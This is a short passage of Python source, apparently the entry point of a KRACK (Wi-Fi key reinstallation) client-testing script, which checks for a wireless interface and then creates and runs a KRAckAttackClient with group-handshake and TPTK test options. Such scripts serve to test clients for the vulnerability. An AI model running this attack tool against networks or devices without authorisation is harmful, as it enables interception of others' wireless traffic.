  587. log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
  588. quit(1)
  589. attack = KRAckAttackClient(interface)
  590. atexit.register(cleanup)
  591. attack.run(test_grouphs=test_grouphs, test_tptk=test_tptk)